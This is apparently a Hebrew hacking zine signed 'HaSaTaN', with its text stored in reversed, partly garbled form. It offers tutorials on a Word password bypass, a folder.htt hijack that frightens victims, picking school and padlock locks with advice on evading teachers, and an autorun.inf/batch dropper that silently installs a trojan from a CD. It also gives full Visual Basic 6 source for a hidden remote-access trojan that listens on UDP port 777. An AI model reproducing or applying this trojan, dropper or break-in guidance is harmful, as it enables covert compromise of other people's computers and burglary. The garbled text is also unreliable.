+המל םילאוש
אוהש רבד( םיימינונאכ וניהדזה ןושאר רבד (השע ונלש ןקה יולפסקאה המ הארנ םדוק ואוב
הארנכ םיוסמ תרשל הזה יולפסקאה תא םתאצמ םא לבא (םיליגר םיתרשב ינויגה ךכ לכ
הדוקפה ()תימינונא הסינכל תורשפאה תא הנשי הזה תרשבש hello םיימינונאכ ונתוא ההזמ
( ונליבשב םיבושחה םיצבקה לכ תא קיתעי אוה וישכע ()תרחא תוהז גיצנ אלש דע (םייתניב(
pwl ( ילורב חוכ םא םיצבק'ה תא חצפל ךרצנ זאו )תואמסס םינסחואמ םהבש םיצבק םניה
brutal - force 'יצבק הזש ךכב בשחתהב חילצנש חוב אלש רבד () pwl 'ו log אלו םיתרש לש
.הלודג רתוי הברה היהת החבאה תמר זא (םיליגר םיבשחמ לש
HaSaTaN
9J+
SSL
'ה לוקוורפ ssl
והמ ssl +םילאוש םתא
!לכה ריבסי ינא (תונלבסב וכח
:עקר תצק לכ םדוק
'כ ינפל רצונ לוקוורפה 5 תרבח י$ע םינש netscape הזה לוקוורפה ()פייקסנ ןפדפדה(
'ה לוקוורפ לעמ בשוי tcp/ip !דבלב תחא איה ותרמו
'ה לע דודיק י$ע ןגהל phackts !םכלש
+++
o.k !רתוי בו ריבסנ (וגאדת לא (םתנבה אל .
דיגנ נרניאב תונחל םתכלהש דיגנ www.amazons.com !והשמ םש תונקל םיצור םתאו
םישקבתמ םתא (םתמייסשכ (םכלש תוינקה לסל ותוא םיפיסומו רצומה תא םירחוב םתא זא
+ןוכנ (םכלש יארשא סיכ'ה רפסמ תא םיסינכמ םתא ובש ספו אלמל
$ןכ$
םתצחל (הפי ENTER אלמל ותוא קלחמו םתסנכהש עדימה תא חקול םכלש בשחמה +הרק המ
!םכלש ספוה לש םירפהמ תצק ליכמ קלח לכ (םיקלח אלמ
:םיארקנ הלאה םיצבקה phackt 'ו דיחיב phackts .םיברב
'ה תא( םתוא חלוש אוה ...ו phackts !תעצבתמ הנמזההו תרשל )
'ה תא תחקל תושפבו אובל לוכי אוה (תרשל !רפ רקאה הזיא דיגנ phackts !םכלש
+הא דיחפמ
+ןוכנ (ןיילנוא םינוק אל םתא (םויהמ
!$אל$
'ה לוקוורפ תא ואיצמה ןכל ssl 'ה תא חקול (לוקוורפה ( Phackts םתוא דדקמ ושפו םכלש
'ה תא חקי אוה םא ול רוזעי אל (תרשל רקאה !רפ םא וליפא ךכ (אורקל לוכי תרשה קרש הפשל
phackts !םכלש
'ה לכ יכ Phackts !םידדוקמ
% %
%
:ארקנש שדח ןוחיב לוקוורפ אצי ןמזמ אל TLS
'ה לע ססובמ הזה לוקוורפה ssl םיבוה וליפא( םירקאהה לע ושקיש םירופיש םא לבא
'ה תא חצפל )רתויב Phackts !
% %
%
:תוצופנ תולאש
+נרניאב םירבד תונקל יל יאדכ םאה :ש
!לוז רתוי וליפא הז כ$דב (חב :ת
+םיוסמ הנגה לוקוורפ י$ע ןגומ םייוסמ רבד הנוק ינא ובש רתאה םא עדוי ינא ךיא :ש
9J9
לש ןמיס ךסמה תיתחתב הארתש וא (תאזכ העדוה ןימב ךל עידוי ןפדפד'הש וא (ושפ יד הז :ת
!בוהצ לוענמ
!!!דימ רתאהמ אצ ל$נה םירבדהמ דחא תא ןיא םא
HaSaTaN
רקאהל תורבידה תרשע
1 !םולכ אל (יארשא סירכ אל (םש אל ןופל אל (תשרב ההדזת לא (םלועל לבא (םלועל .
2 !!!םישדח םירבד תושעל הסנתו דמלת (דימת לבא (דימת .
3 לע והשמ עדוי התאש )םינונח אי ךלש אמא היהיש (רדסב (ךלש אמא( ךש"אמאל רפסת לא .
!גניקאה
!תינב אל דועש הריירקה תא ךל סורהת איה
4 .ל$נכ (ךלש אבאל רפסת לא .
5 .)הלעמל תבותכה( !ילש רתאה היהי הזש (בו בו גאדת (םירקאה לש רתאל סנכנ התא םא .
6 .הזה רתאל רתוי סנכית לאו (םייניעהמ יל #וע (רמייל התא םא .
7 'ל יל קבדנ הז (םיקיסמ םע ילש רתאל סנכית לא . ftp !ךלכולמ הארנ ילש רתאה הז ירחאו
8 'ב ילא הנפ יל דיגהל םיבו םירבד ךל שי םא . icq
9 רפסמ ןייע( (ךלש אמאל םתוא דיגת (יל דיגהל םיער םירבד ךל שי םא . 3 )
10 ...דחא םוי ךל רוזעי הז (פ$עב הז תא דמלתו (רקאהה לש תורבידה'תרשעב ןייע םוי לכ .
HaSaTaN
9J3
לש תואמסיס #וקעל WORD
:ןק פי הנה
לש אמסיסה תא #וקעל ךיא וישכע ודמלת word .ינדי ןפואב (
( חוב בצמב בשחמה תא וליעפה ושפ safe mode .)
'ה תואסרג בורבו (דרווה ךמסמ תא וחתפת word .אמסיס אלל חתפי ךמסמה
HaSaTaN
9J:
רורא תעדוה 2
(הללעל להבי ()..תורדגה( םיבשחמב הברה ןיבמ אל םכלש ןברוקה םאש והשמ הניה זא בו ייה
הייקתה תא חתופ אוהשכש אוהשמ הז Program files וא Windows וצרפש העדוה הארי אוה
.היקתל סנכהל לכוי אל אוהו ול
ךרד תעצבתמ םיצבקה לש הגצההש הדבועה לע דבוע םצעב הז HTML לפמקל ךירצ אל ןכלו
ררולפקאה הלא הז תא
תגצהל יארחאש !בוקה לש דוקה תא יתיניש הז יתישעש המ הרקמ לכב דבל הז תא לפמקמ
( םיצבקה folder.htt ()
$ל יתיניש ותוא םגש( $םיצבק גצה$ תויהל רומאש קנילה לע וצחלי רשאכש םוקמבש ךכ
www.hasaatn.up.co.il )$
...#דה תא אצמל רשפא יאש רמואש #דל ליבוי אוה
םעפב (והזו (םיצורש הייקתה ךותל !בוקה תא ול ליתשהלו ילא רבחתהל הז תושעל ךירצש המ
סנכי אוהש האבה
!!!העדוהה תא לבקי אוה היקיתל
( ביתנה תא בותכל םשו (רתא / הנכות תחיתפ ידי לע םשל ותוא איבהל םג רשפאו c:\windows .)
םתאש ךיא !בוקה תא תונשל םילוכי םתא סנכיהל ילב וליפא תימווא הז תא הארי אוה זאו
.ול חולשלו (אל וא םינכוסמ רתוי םירבד תושעלו םיצור
!האבה םעפל דע הז ...בו
HaSaTaN
9J=
םילוענמ תצירפ
תא תחקל לוכי אל רחא דחא #או ותוא יתאצמה ינא דבל בתוכ ינא הזה ךירדמה תא הככ זא בו
+הלאש םכל שי (וילע ידרקה
%%!ח ו ב!%% הזל רשקב עדא חוב חוב ינא יכ יתוא ולאשת
.)יילע בוהאה אשונה( היכרנא אשונב הז (בתוכ ינאש ןושארה ךירדמה הככ זא בו
יס ייאב יתיא ורבד השקבו הלאש לכל הלועמ תוצצפבו גניקירפב ןיבמ םג ינא םיצור םתא םא
ילש ויק
!!! רגפמ עמשנ הז יכ קיציא ול אורקל אל ולדתשת השקבבו
:הככ זא
םילוענמ תצירפ אשונב היהי ךירדמה
ok lets see :
:!ורפל לק שממש םילוענמ יגוס השולש שי הככ זא
1 .סיסבב םילבקמש ל$הצ לש ןק לוענמ .
2 לוענמ . 312 לע ותרזעב םינגמ רפסה יתבבש לוענמ והז )הצירפל השק רתוי( רפוסב םינוקש
.לכה
3 .ו$כו שיבכע תלדלפ תמגודכ רתויב בוקר תלד לוענמ .
!!!םיכישממ ונחנא ייק וא
:םיכרצמ
1 דחא דומעל ותוא חותפל רשפאשו תוריינ ותרזעב םיספותש ריכמש ימל לזרב בא ומכ'הכיס .
.ךורא
2 .יחרכה אל שממ לבא !למומ תויהל לוכי םג ןק גרבמ םימעפל .
3 .ןיכס .
4 .)םלוכל הז תא שיש יל הארנ אלו בושח יכה( חומ .
:רתויב ןכסמהו רתויב ןקה לוענמה םע ליחתנ (לועפל םיליחתמ הבבס זא
:ושפ יאבצ לוענמ
תא וסינכת ךכ רחא םינפבש המ לכ רובשל וסנת ארונ קזחו גרבמה תא וכותל וסינכת הככ זא
חתפיי אוהו הכיסה
!!!לוענמ לש ארח אוה יכ
:ס$היב תא סורהל םיתמש םישנאל ינש לוענמ
1 .םילוענמ יצרופ םתאש םלוכל ורפסת לא .
2 .הלועפה ךרד תא םלועל ורפסת לא .
9JJ
3 ....וכו תרש,הקנמ,הרומ,להנמ הזיא עיגמ םא תוארל םיייניע וחתפת .
4 .)אלמ שי ס$היבב ילצא( החבא תומלצממ ורהזת .
5 !!!עגרכ יתמשרש המ תא וננשתו )!!!בוש( חומב ושמתשת .
:םיכרצמ
4444444
1 .םדוקמ ומכ הכיס .
2 .ביצי רובידו עונכש רשוכ .
3 ....וכו הכסמ(םיילגר(םיידי(ןיכס:דבלב עברא תא רסחש ימל דעוימ .
!!!ךרדל םירזוח זא
םעפב יל הרקש יתימא רופיס הז( רפסה תיבב םיכלוה םתא (הזכ ילמרונ בצמ םכמצעל וניימדת
.)הנושארה
לוענמ תרזעב לוענ םיאבכ זרב םיאור םואתפ 312 ומכ הכיס םש םיאצומו התיכל םיכלוה םתא
!!!םדוקמ יתרמאש
הז םלועב בהוא יכה אוהש רבדהש להנמה עיגמ עתפלו ותוא םיצרופו לוענמל םיכלוה םתא
יל הלפנש ול יתינע ילש הרקמב (םישוע םתא המ םכתא לאושו ס$היבמ םידימלת #יעהל
(הנתמב יתלביקש הכיסה
ררבתה #וסבש ילש ןוויכל אב הרומ יתלקשכ תוריהמה אישב התוא יתכשמש ירחא(
.)!!!להנמכ
:רוציקב הנשמ אל בו
:הלועפה ךרד
!!!ולכתסתו ואובת דימת תומלצמ םש שי םא בו ולכתסת לכ םדוק לוענמ וארתש עגרב הככ זא
התוא ומקעת זאו רשי ומ ומכ הארת איהש דע התוא וחתפתו תכתמ תכיסה תא וחק ךכ רחא
$ ומכ תווש תוכיתח יתשל V הז בבוסל וליחתתו לועממל וסינכת ךכ רחא (הכופה היהתש לבא .$
!!!לוענמת חתפיי חוב
!!!ןויסנמ
ונישע קוידב המ ייק וא (לוענמה ירוחל סנככיש ידכ ןק אלו לודג תויהל ךירצ באה בגא ךרד
+הפ
םיינישל סנכנ הזה דחו קדה והשמה חתפמת םיסינכמ אובש רוזיאה ךותל דחו קד והשמ ונסנכה
!!!םתוא חתפו לוענמה לש
!!!הנוכנ איה לבא תיליבד תיארנ הירואתה
וא חירסמ הרומ הזיא עיגמ אל דחא #א םא תוארל ןיע םיחתופ םתא הלועפה לכ ךשמב וישכע
!!!המוד והשמ
םייניעב הדובעו קחשמש םישנא םתא םאו !ורית אוהש הזיא םע הזמ ואצת זא עיגמ ןכ םא
עונכשו
עדוי ינאש םישנא שי זא םכתוא םיספות םאו תוריהמב וחרבת זא םהלש קזחה עקה אל הז
םע והשמ ושעיש
!!!םדוקמ וילע יתצלמהש ןיכסה וא םיידיה
:ןורחא לוענמ
!!!הזב אצויכו שיבכע תלדלפ תותלד לש לוענמ
םעפה לבא ותוא בתוכש םנמא ןושארה ינא רחא דחא #א י$ע אל ןורחאה לוענמה לע ךירדמה
ורבדש הנושארה
ינאש הזמ !וח הל רומש ידרקה לכ זא( !!ןייד הנליא םע'$הדבוע$ תינכתב התייה וילע
.)!!!הז תא בתוכש ןושארה
:םיכרצמ
1 .!ורפל ולכותש ידכ תלדלפ,שיבכע לוענמ .
9JN
2 !!!תיב לש חתפמ .
.)דבלב תיבה לש אלא ןסחמה לש וא ראודה תבית לש םוקרניאה לש אל(
3 .רייאלפ .
4 .עונכש רשוכו םייניע חומ דימת ומכ .
םיבבוסמו רייאלפה תא םיחקולו חתפמה תא קזח וילא םיפחוד לוענמ םיאצומ םתא הבבס זא
.קזח ארונ ותוא
1 םכלש תיבה לע הז תא וסנת לאש הככ רבשי חתפמהש םייוכיסה בור .
.)התיבה סנכיי אלש הככ והשמ קופדל םיצור םתא םא בו תויהל לוכי הז(
2 .)תיבל !וחמ עוקת היהש ילש רבחל הרק הז םימעפל ארוק( !!!חתפית תלדה .
3 !!!ןכש םכתוא סופתי .
הרקמב 3 יאדכ זא (שנוע תכיתח הז הצירפו תיבל הצירפ הז יכ רסאמ ולבקת םתאש ועדתש קר
הזמ תאצל וחילצתש
וא תוכמ(ופחת ןיידע ודיגת המ הנשמ אל יכ רבדל תעדל בושח תוחפו םייניעה בושח ארונ הפ
.)ורחבתש המ שנוע
וספתיש יאדכ אל שממ לבא שממ יכ המ עדוי אל ומכ וחרבת םכתא םיספותש עגרב:ילש העצה
!!!םכתוא
אוה םא אלא םולכ םכל הרקי אל ןושארה לוענמל הצירפ לע בגא ךרד לכה לע ונרבע זא ייק וא
רושק
!!!תוירפל הרידח ) הצירפ הז זאו קית אוהש הזיאל
התרקש אמגודה ומכ והשמ לע סופת אוה םא אלא םולכ םכל הרקי אל ינשה לוענמל הצירפ לע
אוהש יל
דחיב םהינש וא םזילדנוו השעמ וא הצירפ :אוה ולבקתש שנועה רפסה תיבב יוביכ זרב לע היה
!!!םייחב םכל שי סחאנ המכ יולת
HaSaTaN
9J.
Autorun
+בצמה המ ייה
.םכב דושחי אוהש ילב יניור / סוריוב והשימ קיבדהל ךיא דומח ןויער לע יתבשחו יתבשי
'ו ותוא חתופ אוהו !בוק והשימל חלוש התא םא יכ 2 םתא בשחמל ול !רפ והשימ ךכ רחא תוקד
...ולש לוסיחה תמישרב דיימ ויהת
וא בשחמה לא םהילא עיגהל םילוכי םתאש םירבח לע קר דובעי אוה לבא ילש ןויערה אב הפ זא
םתא םתלק אל ןידע םא רציקב ()תילאקול השיג( יזיפ עגמב ותיא תויהל םילוכי םתאש
( םורידיס ול ריבעהל םיכירצ CD-ROM .רוילקת תירבעה הפשב וא )
:דבוע הז ךיא
םשב שדח !בוק םירצוי הככ זא autorun.inf :םיבתוכ וכותבו
פיש לורנוק
5 autorun &
icon÷<icon's path .
open÷Autorun.bat
פיש לורנוק
:רבסה
5 autorun !בוקה תרדגה '&
icon÷<icon's path .!בוקה לש םשהו םוקימה2 - .
open÷Autorun.bat .תושעל םידמוע ונחנאש !בוקה תא תיתמווא חתופ '
םשב שדח !בוק םירצוי Autorun.bat :םיבתוכ וכותבו
פיש לורנוק
= echo off
copy <trojan's (patch.exe)> <c:\game-name.exe .
cls
2 c:\game-name.exe .
( פיש לורנוק 22 ctrl + shift .. )
:רבסה
= echo off תודוקפה תא גיצי אלש רמוא '
9J;
copy <trojan's name.something> <drive:\path\trojan's name.exe תא קיתעמ .
בשחמל יניורה
cls ןולחב שיש המ לכ תא קחומ '
2 drive:\path\trojan's name.exe .בשחמהמ יניורה תא ליעפמ ' .
+++ בשחמל יניורה תא קיתעהל המל םכמצע תא ולאשת וישכע
לבא ימווא יניורה תא ליעפי הז זא בשחמל יניורה תא קיתענ אל םא יכ הככ זא בו
לפכיש יניורה םע אלא לועפל קיספי יניורה ידיסה תא איצותש עגרבש תרמוא תאז ידיסהמ
ידי לע( דבל םירחא תומוקמל ומצע תא
לעפי אוהו פאראס היקיתל ותוא קיתעהל רשפא םיצור םתא םא (וישכע .)ימינפ דוק
תא םיבתוכ תומוקמ המכל קיתעהל םיצור םא בשחמה תא םיליעפמש םעפ לכ תימווא
: הרושה
copy <trojan's name.something> <drive:\path\trojan's name.exe .
( ביתנה תא םינשמו תמדוקה תחתמ םעפ דוע path .)
ול וארקית לא ונעי יודב םשב יניורל םיארוק הלחתהב והשמ דועו הא virus!-dont-open.exe
ומכ והשמ ול ארקל רשפא Data.vxd אל #ידע םגו הא בושח !בוק הזיא ומכ האריש והשמ וא
מ רתוי ךורא םשב ול ארקל 8 .םירפסמהו )8(תודליה םא תויעב תויהל םילוכי זא יכ תויתוא
KissMyAs~1.exe 'ה s 'מ ךורא רתוי הזש ללגב הלפנ 8 ...תויתוא
ונבתכ המל CLS תא רבכ ונל שי םא echo off +++ =
תא ונבתכ cls מ תרזוחש הבושתה יכ COPY הזש יל הארנו התוא םיקחומ ונחנא זא תבתכנ ןכ
השוע םימעפל םג
.)...אל םימעפלו דבוע הז םימעפל יכ $יל הארינ$ רמוא ינא( תינכותה תרמגנשכ רגסי ןולחהש
....יל הארנ והז
:בושח יכה עקה תא יתחכש אל !הא
םיברוצ CD-ROM םא 3 ( םיצבקה data.vxd autorun.inf Autorun.bat לכב ותוא אלמתו )
לבז םע תויקית ינימ
)קסידה תא אלמישו םוקמ סופתיש(
תורשפאה תא םסחל אוה םא זא ןנוכל ידיסה תא סינכי אוהש עגרבש הז תורקל רומאש המ
תימווא הלעפהל
ב( 98 ב ירסי"גרב הז XP !בוקה זא )הרקב חולב הז autoran.inf !בוקה תא ליעפי
autorun.bat .ותוא ליעפיו בשחמל יניורה תא קיתעי אוהו
!םייתנבל והז זא בו
HaSaTaN
9N*
Visoal basic torgan
תא וניקתת םדוק VB6 :ךכ רחא ()ותיא דבוע ינא(
1 .)...סק תבית ןצחל( םידקפה לכ תא םכל שיש הפיאל וכל ירדנס שדח ספו וחתפת )
.' ינמי ןצחל components :תינושל .' controls .
$ב ונמסת V תא $ Microsoft Winsock Control 6.0
...בוש ושפחת ...זא הזכ רבד םכל ןיא םא
'ל וכלת זא ןיא ןיידע םאו browse !בוקה תא ורחבית םשו mswinsck.ocx $ ב אצמינש
c:\windows\system $
תרוצב דקפ דוע םכל #סונ 2 םכל #סבתי אוהו #וצר םימעפ וילע וצחלת םירבוחמ םיבשחמ
ספול
'ל םשה תא ול ונשת win .
'ב ונישעש המ לכ וישכע 1 תא םעפ דוע וחתפת( םעפ דוע ושעת VB םכל היהיש 2 לש תונולח
VB )...
( רומש םהינשל ושעת וישכע save וארקת דחאלו ) server ינשלו trojan .
ונחתפ הז וישכע דע ונישעש המ 2 .לשל דחאו יניורל דחא םיקיורפ
'ל םשה תא ול ונשתו סק תבית לשה לש ספול ופיסות ip :ל סקה תאו 127.0.0.1 .
( בותיכה תא ונשתו ספול ןצחל ופיסות caption .$רבחתה$ל )
2 לכ תא וקחמת לשה לש דוקה לש ןולחה םכל חתפי ספוה לש קיר חש לע םימעפ וצחלת )
:ומשרתו םש םושרש המ
9N+
h]R]G]
,u@W@?R_u ! dGR?CD a@ED?TT CDED BRCW ]A] Z@R`UG
u_DTu ! a^D[B RBTWT CDED?
%%%Z^ D^ d?^W] aT] BD ]AT S?RUD
X_DTY @W@?R_? XdGR?CY RGRc ]A R?CU]
t]^^ G?S^@ @WB X@DTY S?E?W @U\_U DGB
פיש לורנוק
Private Sub Command1_Click )(
On Error GoTo er 'er ל ךל תוע לש הרקימבש הארוה'
Win.RemoteHost ÷ ip.Text םתסנכהש יפייאל רבחתהל קוסניווה תא ןווכמ"
Win.SendData "Connect תדוקפ חלוש" $ connect
Exit Sub
er :
MsgBox ($תבותכ תבתכ אלש הארנכ$ vbCritical $רוביח תיעב$ (
End Sub
Private Sub Form_Load )(
with win
. Protocol ÷ sckUDPProtocol לוקוורפל קוסניווה תא ןווכמ" UDP
. RemotePort ÷ 777 רופל רבחתהל קוסניווה תא ןווכמ" 777
. Bind
end with
ip.Text ÷ Win.LocalIP ימוקמה יפייאל יפייאה לש הביתה תא ןווכמ"
End Sub
Private Sub Win_DataArrival(ByVal bytesTotal As Long עדימ לבקתהש הרקמב" )
Dim data As String לבקתיש עדימה תא ליכיש תזורחמ גוסמ הנתשמ רידגמ"
Win.GetData data הנתשמל לקה תא םיסינכמ"
Select Case data לבקתה המ םיקדוב"
Case "connected לבקתה םא" $ connect
Form1.Caption ÷ data ל םרופה לש תרתוכה תא ךופה" connected
End Select
End Sub

םיאבה םירבדה תא ובתכתו יניורה לש דוקה ןולחב לכה וקחמת וישכעו
Private Sub Form_Load )(
With Win
. Protocol ÷ sckUDPProtocol לוקוורפל ןווכמ" UDP
. LocalPort ÷ 777 רופל בישקהל ןווכמ" 777
. Bind
End With
Form1.Visible ÷ False םילעהל ךיא ריבסנ ךכ רחא ') הארנ יתליבל יניורה תא ךפוה"
י)עמכ( ירמגל
End Sub
Private Sub Win_DataArrival(ByVal bytesTotal As Long עדימ לבקתהש הרקמב" )
Dim data As String תזורחמ גוסמ הנתשמ רידגמ"
Win.GetData data הנתשמל לקה תא םיסינכמ"
MsgBox (data הרקב ךרוצל)ינמז(העדוהכ !ופקת תרבועש הדוקפ לכ" )
9N9
פיש לורנוק
פיש לורנוק
Win.RemoteHost ÷ Win.RemoteHostIP תבותכל םינותנה תחילש תבותכ תא ןווכמ"
עכ וילא תרבוחמש
Select Case data לבקתה המ םיקדוב"
Case "Connect לבקתה םא" $ connect
Win.SendData "connected הרזחב חלש" $ connected
End Select
End Sub
ל רבחתהל ידכ קוסניווב תשמתשמש הנק תינכות הז וישכע דע ונתישעש המ IP רופב 777 .
תדוקפ תחלוש connect המישמה תא עצבמו הלבקתה הדוקפ הזיא קדוב יניורהו יניורל
' םאתהב הדוקפ הרזח חלוש( הזכ הרקמל תרדגומה connected הדוקפ קדובו לבקמ לשה .)
ילמרונ יניור חתפנ ונחנא הזמו סיסבה הז .הזכ הרקמל תרדגומה המישמה תא עצבמו הלבקתה
.)...ןיבה אלש ימל סונימ סולפ( ')
הסנתו ארקתו הסנתו ארקתו רוזחת זא אל םא לבא (אורקל ךישמת בו דבע לכה וישכע דע םא
קר רתוי וא תוחפ וישכעמ יכ וישכע דע לכה חילצהל דואמ בושח .חילצתש דע הסנתו ארקתו
.הזה סיסבה תא םיללכשמ
OK לש הרוצב ךישמנ ונחנא םיכרד ינמ לכב ךישמהל רשפא הפמ ( HaTrojan .)ןוילגל #רוצמ(
.$שמתשה$ בותכ היהי וילעש ןצחל ופיסות
'בו לשה לש ספול סקוב סיל ופיסות form1_load ינפיל #וסב ופיסות end sub .
List1.AddItem "send msgbox )הרוש( ירפ המישרל #יסומ" $
List1.AddItem "get input )הרוש( ירפ המישרל #יסומ" $
List1.AddItem "descover trojan )הרוש( ירפ המישרל #יסומ" $
בותכתו שדחה ןצחלה לע םימעפ !חל
Dim pr As String תזורחמכ םירמרפה תא ליכיש הנתשמ רידגמ"
Select Case List1.Text הרחבנ הלועפ הזיא קדוב"
Case "send msgbox ...ש הרקמב" $
pr ÷ InputBox("what do u want 2 send רמרפה תא ולק" )$+
Win.SendData "msg " & pr רמרפ ) חוור ) גסמ הדוקפה תא חלוש"
Case "get input ...ש הרקמב" $
Win.SendData "get הדוקפה תא חלוש" $ get
Case "descover trojan ...ש הרקמב" $
Win.SendData "show הדוקפה תא חלוש" $ show
End Select
9N3
פיש לורנוק
פיש לורנוק
פיש לורנוק
פיש לורנוק
ב בותכש המ תא וקחמת win_DataArrival ינפל דע end sub
םיאבה םירבדה תא ובתכתו
Dim data As String לבקתיש עדימה תא ליכיש תזורחמ גוסמ הנתשמ רידגמ"
Win.GetData data הנתשמל לקה תא םיסינכמ"
Select Case data לבקתה המ םיקדוב"
Case "connected לבקתה םא" $ connect
Form1.Caption ÷ data ל םרופה לש תרתוכה תא ךופה" connected
End Select
Select Case Left(data, 3 םירמרפ םע תודוקפ ליבשיב שדח קלס" )
Case "get ... ש הרקמב" $
pr ÷ Right(data, Len(data) - 4 הדוקפה ירחא אבש ךרעה תא לבקמ הנתשמה")
MsgBox (pr הנתשמה תא לפל איצומ" )
Case Else קנוק תדוקפ היה הזש וא וישכע דע רבד םושל םיאתה אל םא"
MsgBox (data עיגהש עדימה תא לפל איצומ" )
End Select
ב בותכש המ תא וקחמתו יניורל ורבע win_DataArrival ינפל דע end sub תא ובתכתו (
:םיאבה םירבדה
Dim data As String תזורחמ גוסמ הנתשמ רידגמ"
Dim pr As String
Win.GetData data הנתשמל לקה תא םיסינכמ"
Win.RemoteHost ÷ Win.RemoteHostIP תבותכל םינותנה תחילש תבותכ תא ןווכמ"
עכ וילא תרבוחמש
Select Case data לבקתה המ םיקדוב"
Case "Connect לבקתה םא" $ connect
Win.SendData "connected הרזחב חלש" $ connected
Case "show ...ש הרקמב" $
Form1.Show רתסומה ספוה תא גצה"
Win.SendData "show OK החלצהב עצובש רושיא לשל ריזחמ" $
End Select
Select Case Left(data, 3 םא םיקדוב" ) 3 תודוקפה דחאל תומיאתמ תויתואה
Case "msg ...ש הרקמב" $
pr ÷ Right(data, Len(data) - 4 הדוקפה ירחאש םירמרפה תא לבקמ הנ!שמה" )
MsgBox (pr הנתשמה תא לופ" )
9N:
פיש לורנוק
פיש לורנוק
פיש לורנוק
פיש לורנוק
Win.SendData "msg is OK החלצהב עצובש רושיא לשל ריזחמ" $
Case "get ...ש הרקמב" $
pr ÷ InputBox("get שמתשמה לש לקה תא לבקמ הנתשמה" )$
Win.SendData "get " & pr הנתשמ ) חוור ) הדוקפה תא חלוש"
Win.SendData "get OK החלצהב עצובש רושיא לשל ריזחמ" $
End Select
יל וחלשת( לודג יניור הזיא ושעתו התוא וללכשתו תיסיסבה המגודה תא וחקת םויהל והז
' קתעה LOL ()
'המ תונויער לבקל םילוכי םתא םיצור םתא םא HaTrojan ...הנבמו תולועפל
.ב.נ
.רמייל - )רחא והשימ לש( יניורב שמתשהל
.)!זורח ' הלאוו( !רדסב - ותוא תונבל
HaSaTaN
9N=
פיש לורנוק
bios
+++ הרוק המ (ןלהא
לע םימורופבו םי"צב םכתיא םירבדמ םויה לכש םינבצועמ'יד חב םתא BIOS אלמ דועו
ולקל וליחתתש ןמזה עיגה זא (םירבדמ םה המ לע גשומ םכל ןיא ' ושפ םתאו (הלאכ םירבד
"וכו הזב םישמתשמ ךיא (הז המ
:סקדניאה הנה זא
'ה דעוימ המל % BIOS
'ב םישמתשמ ךיא % BIOS
'ה אצמנ ' ללכב הפיא% BIOS
'ה לש אמסיסה תפיקע % BIOS
'ב םיפי % BIOS
'ה דעוימ המל 444 BIOS 444
'ה BIOS והשלכ ןוימיד שי ךא ' רבד ותוא אל םה ןוכנ (ירסי"גרה תא תצק ריכזמ ' המ םושמ
.םהיניב
Ok 'ה ' הככ זא ( BIOS (בשחמב רתויב תובושחה תורדגהה תא עובקל ליבשב (םיתנכתמל דעונ
:אמגודל (דעל םייח קובשי בשחמה םהידעלבש
'ל הקולח ' הגוצתה תורדגה (חישק קסידה תרדגה PARTITIONES אל זא ןיבמ אלש ימ(
)בושח שממ אל הז (הנשמ
.דורשל יוכיס ןיא םכלש בשחמל ' הז ילב :םילימ עבשב
'ב םישמתשמ ךיא 444 BIOS 444
תסריג תא תוארל ולכות הלעמל' בשחמה תא םיקילדמ םתאשכ לבא ' הז תא םיריכמ חב םתא
'ה BIOS :םיבשחמה בורב 4.51 'ה תא תולעהל ליבשב ( BIOS יפכ הנק הנכות םצעב הזש '
וצחל (ןיבהל םתקפסה רבכש DEL לש ןימי דצב םירפסמה לש לודגה ספאה דיל אצמנש
תויורשפא ינימ לכ םא ךסמ ןמ תוארל םירומא םתא הציחל לש תוינש המכ רחאל (תדלקמה
:אמגודל
cimos
futers setup
...דועו דועו
'ב תויורשפאה לש יוניש .ליעל יתבתכש תורדגהה לכ תא רידגהל ןתינ (המש BIOS ןומיס ךורכ
תציחלו היוצרה היצפואה PAGE DOWN וא PAGE UP .
9NJ
$ 'ה אצמנ ללכב הפיא 444 BIOS 444 +הזה $
קר ןועש לש ומכ (תאזכ )הללוס( היירב ןימ םש וארת םתא (ומצע בשחמה תא וחתפ (יקוא
יפ הלודג 3 חולה לע ' הז לכ( קו"ג תוארל ולכות הדיל ( M 'ה בורצ הזה קו"גה לע )ןבומכ BIOS .
'ה לש אמסיסה תפיקע 444 BIOS 444
'ל םתסנכנו הרק BIOS +יהמ גשומ םכל היה אלו אמסיס שקיב אוהו
:תושעל המ ועדתו (אבה רבדה תא וארק
'ל תרשפאמש וז איה םצעב םיאור םתאש הללוסה (בשחמה תא םעפ דוע וחתפ BIOS (דובעל
'ה BIOS .עקתה לש למשחה לע דבוע אל
'הו הללוסה תא ואיצות ' דואמ ושפ אוה תושעל םיכירצ םתאש המ לכ זא BIOS ולוכ קחמי
רחאל םתאו 30 יפל ויהי תורדגהה לכו שדחמ בשחמה תא וליעפת (הללוסה תא וריזחת תוינש
'ה לש אסרגה לש לדחמה'תרירב BIOS )......בינגמו ......םח( !אמסיסה קחמית (ןבומכ ' םגו (

'ב םיפי 444 BIOS 444
אל םכל ןיאו בשחמה םכל קפדנו דיגנ % windows אלו DOS 'ל וכל ושפ BIOS ל ושג
feuters setup $ הביתה לע ודמע המש squence boot וצחל $ page down :ל ועיגתש דע c,cd-
rom,a .
'המ ואצ (הככ הז תא וריאשה feuters setup וצחלו exit and save תא וסינכה םייתניב '
לש הנקתהה תא תיתמווא ליעפיו ותוא ההזי בשחמהו סואודניווה לש רוילקתה windows .
'ב םולכ ונשת לע םלועל % BIOS בשחמה תא קופדל לוכי הז ' םדוקמ םכל יתרמאש הממ !וח
!! תושק םכלש
HaSaTaN
9NN
ילורב חוכ
+ילורב חוכ והמ
+++הז תא םישוע ךיא (ליימיא וא (רתא !ורפל םיצור םתאש דיגנ
!ילורב חוכ תונכות לש םיגוס יתש שי (ילורב חוכ תוארקנש תונכות שי זא
'''''-----ןושאר גוס-----''''
'ה תא םהל איבמ התא username 'ה תא ךל תולגל תורומא םהו ( password תושוע םה דציכ (
+הז תא
:אמגודל (תוירשפאה תויורשפאה לכ תא תוקדוב םה ושפ (ךכ
:הככ תוקדוב םה
111 : username
112 : username
113 : username
114 : username
'ה( username לש ינשה דצהמש המו (הנכותל תתנ התאש שמתשמ םשה תא למסמ
)אמסיסה הז (םייתדוקנה
.אמסיסה תא #וסב תאצומ ילורבה חוכה לש הנכותה ךכ
'''''-----ינש גוס-----'''''
'ה תא םהל איבמ התא username 'ה תא ךל תולגל תורומא םהו ( password תושוע םה דציכ (
+הז תא
תא תקדוב ושפ הנכותהו (תוירשפאה תואמסיסה לכ תא שי ובש (ןכומ סק !בוק םהל שי
תואמנש (תוירשפאה תואמסיסה לכ םע המאתה י$ע (אמסיסהו שמתשמ םשה לש המאתהה
.!בוקב
:תוצופנ תולאש
1 +תחקל רומא הז ןמז המכ (יל חילצי הז םא .
